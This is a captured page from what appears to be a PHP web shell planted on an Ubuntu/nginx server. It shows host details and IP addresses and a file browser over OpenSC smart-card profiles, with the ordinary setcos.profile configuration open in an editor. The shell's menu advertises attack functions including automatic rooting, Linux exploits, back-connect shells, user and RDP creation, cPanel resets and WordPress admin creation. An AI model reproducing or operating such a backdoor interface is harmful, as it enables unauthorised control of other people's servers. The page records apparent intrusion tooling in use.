Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core24 /
1196 /
usr /
share /
opensc /
[ HOME SHELL ]
Name
Size
Permission
Action
asepcos.profile
2.54
KB
-rw-r--r--
authentic.profile
2.86
KB
-rw-r--r--
cardos.profile
2.77
KB
-rw-r--r--
cyberflex.profile
2.85
KB
-rw-r--r--
entersafe.profile
3.8
KB
-rw-r--r--
epass2003.profile
4.18
KB
-rw-r--r--
flex.profile
3.09
KB
-rw-r--r--
gids.profile
230
B
-rw-r--r--
ias_adele_admin1.profile
4.92
KB
-rw-r--r--
ias_adele_admin2.profile
4.9
KB
-rw-r--r--
ias_adele_common.profile
4.84
KB
-rw-r--r--
iasecc.profile
2.84
KB
-rw-r--r--
iasecc_admin_eid.profile
4.91
KB
-rw-r--r--
iasecc_generic_oberthur.profil...
4.56
KB
-rw-r--r--
iasecc_generic_pki.profile
4.9
KB
-rw-r--r--
isoApplet.profile
2.93
KB
-rw-r--r--
muscle.profile
3.38
KB
-rw-r--r--
myeid.profile
6.64
KB
-rw-r--r--
oberthur.profile
4.36
KB
-rw-r--r--
openpgp.profile
1.85
KB
-rw-r--r--
pkcs15.profile
3.86
KB
-rw-r--r--
rutoken.profile
5.38
KB
-rw-r--r--
rutoken_ecp.profile
6.07
KB
-rw-r--r--
rutoken_lite.profile
5.58
KB
-rw-r--r--
sc-hsm.profile
400
B
-rw-r--r--
setcos.profile
3.7
KB
-rw-r--r--
starcos.profile
2.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : setcos.profile
# # General purpose PKCS15 profile for SetCOS4.4 cards # cardinfo { max-pin-length = 8; pin-encoding = ascii-numeric; pin-pad-char = 0x00; } # Additional default settings option default { macros { protected = *=$SOPIN, READ=NONE; mf_prot = *=NONE, CREATE=$SOPIN; # Allow to delete the MF p15_prot = *=$SOPIN, SELECT=NONE, FILES=NONE, CREATE=NONE; pin_prot = *=NEVER, WRITE=$SOPIN, UPDATE=$SOPIN; # WATCH OUT IF YOU CHANGE THESE!! prkey_prot = *=NEVER, ERASE=$SOPIN, READ=NONE, CRYPTO=$PIN, UPDATE=$SOPIN; exkey_prot = *=NEVER, ERASE=$SOPIN, READ=$PIN, UPDATE=$SOPIN; so-pin-flags = initialized, soPin; } } # Additional onepin option settings option onepin { macros { protected = *=$PIN, READ=NONE; mf_prot = *=NONE, CREATE=$PIN; # Allow to delete the MF p15_prot = *=$PIN, SELECT=NONE, FILES=NONE, CREATE=NONE; pin_prot = *=NEVER, WRITE=$PIN, UPDATE=$PIN; # WATCH OUT IF YOU CHANGE THESE!! prkey_prot = *=NEVER, ERASE=$PIN, READ=NONE, CRYPTO=$PIN, UPDATE=$PIN; # READ: only applies on public key exkey_prot = *=NEVER, ERASE=$PIN, READ=$PIN, UPDATE=$PIN; so-pin-flags = initialized; } } # Define reasonable limits for PINs and PUK PIN user-pin { attempts = 3; flags = initialized, needs-padding; } PIN user-puk { attempts = 5; } PIN so-pin { reference = 1; flags = $so-pin-flags; } # Additional filesystem info. # This is added to the file system info specified in the # main profile. filesystem { DF MF { ACL = $mf_prot; size = 42; # size = 2 + 2*(number of sub-files) -> 20 sub-files # There's 1 pin/key file EF pinfile { file-id = 0080; # Recommended by Setec structure = 0x22; # ISF key-file, Setcos V4.4 specific record-length = 28; size = 112; # 28 * 4 = 112 -> 1 SO + 3 user pins/puks ACL = $pin_prot; } DF PKCS15-AppDF { ACL = *=$SOPIN, SELECT=NONE, FILES=NONE, CREATE=NONE; size = 82; # size = 2 + 2*(number of sub-files) -> 40 sub-files EF PKCS15-PrKDF { file-id = 4402; size = 480; acl = $protected; } EF PKCS15-PuKDF { file-id = 4403; size = 480; acl = $protected; } EF PKCS15-CDF { file-id = 4404; size = 960; acl = $protected; } EF PKCS15-DODF { file-id = 4405; size = 480; acl = $protected; } EF template-private-key { file-id = 5100; type = internal-ef; size = 512; # enough for a 1024 bit RSA key ACL = $prkey_prot; } EF template-extractable-key { file-id = 5300; type = internal-ef; size = 512; # enough for a 1024 bit RSA key ACL = $exkey_prot; } EF template-public-key { file-id = 5200; acl = $protected; } EF template-certificate { file-id = 5500; acl = $protected; } EF template-data { file-id = 5000; structure = transparent; acl = $protected; } } } }
Close